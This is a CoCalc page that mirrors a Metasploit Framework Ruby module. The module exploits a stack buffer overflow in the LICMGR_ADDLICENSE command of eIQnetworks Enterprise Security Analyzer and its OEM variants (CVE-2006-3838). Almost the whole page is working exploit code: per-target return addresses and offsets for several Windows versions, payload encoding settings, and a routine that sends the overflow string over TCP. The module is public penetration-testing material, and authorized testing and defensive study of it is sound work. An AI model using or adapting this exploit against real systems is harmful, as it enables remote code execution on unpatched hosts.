CoCalc -- eiqnetworks

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/eiqnetworks_esa.rb
Views: ¹¹⁷⁸⁴

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in eIQnetworks
16
        Enterprise Security Analyzer. During the processing of
17
        long arguments to the LICMGR_ADDLICENSE command, a stack-based
18
        buffer overflow occurs. This module has only been tested
19
        against ESA v2.1.13.
20
      },
21
      'Author'         => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>',  'kf' ],
22
      'References'     =>
23
        [
24
          ['CVE', '2006-3838'],
25
          ['OSVDB', '27526'],
26
          ['BID', '19163'],
27
          ['ZDI', '06-024'],
28
        ],
29
      'DefaultOptions' =>
30
        {
31
          'EXITFUNC' => 'seh',
32
        },
33
      'Payload'        =>
34
        {
35
          'Space'    => 400,
36
          'BadChars' => "\x00",
37
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
38
        },
39
      'Platform'       => 'win',
40
      'Targets'        =>
41
        [
42
          ['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ],
43

44
          ['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 494 } ],   # call ebx
45
          ['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2',      { 'Ret' =>  0x77db64dc, 'Offset' => 494 } ],	# jmp ebx
46
          ['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1',     { 'Ret' =>  0x77d16764, 'Offset' => 494 } ],   # jmp EBX
47
          ['Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English',        { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
48
          ['Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
49
          ['Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
50
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',       { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
51
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2',         { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
52
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',{ 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
53
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
54
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
55
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
56
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
57
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2',   { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
58
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
59
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',   { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
60
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',     { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
61
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
62
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English',          { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
63
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2',            { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
64
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',   { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
65
        ],
66
      'Privileged'     => false,
67
      'DisclosureDate' => '2006-07-24'
68
      ))
69

70
    register_options(
71
      [
72
        Opt::RPORT(10616)
73
      ])
74
  end
75

76
  def exploit
77
    connect
78

79
    print_status("Trying target #{target.name}...")
80

81
    filler =  rand_text_english(1) * (target['Offset'] - payload.encoded.length)
82
    sploit =  "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') +  "&";
83

84
    sock.put(sploit)
85

86
    handler
87
    disconnect
88
  end
89
end
90

91

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.